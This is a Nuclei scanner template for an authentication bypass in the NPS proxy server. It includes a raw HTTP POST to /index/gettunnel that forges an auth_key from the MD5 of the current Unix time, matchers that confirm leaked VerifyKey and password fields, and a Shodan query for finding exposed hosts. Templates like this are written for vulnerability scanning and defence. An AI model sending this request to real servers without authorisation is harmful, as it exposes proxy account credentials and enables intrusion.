nuclei-templates/http/vulnerabilities/nps/nps-auth-bypass.yaml

44 lines
997 B
YAML

id: nps-auth-bypass
info:
name: NPS - Authentication Bypass
author: SleepingBag945
severity: high
description: |
This will reveal all parameters configured on the NPS, including the account username and password of the proxy.
reference:
- https://mari0er.club/post/nps.html/
metadata:
max-request: 1
verified: true
shodan-query: html:"window.nps"
tags: nps,auth-bypass
http:
- raw:
- |
POST /index/gettunnel HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
auth_key={{md5(unix_time())}}&timestamp={{unix_time()}}&offset=0&limit=10&type=socks5&client_id=&search=
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"VerifyKey":'
- 'Password":'
- 'Id":'
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200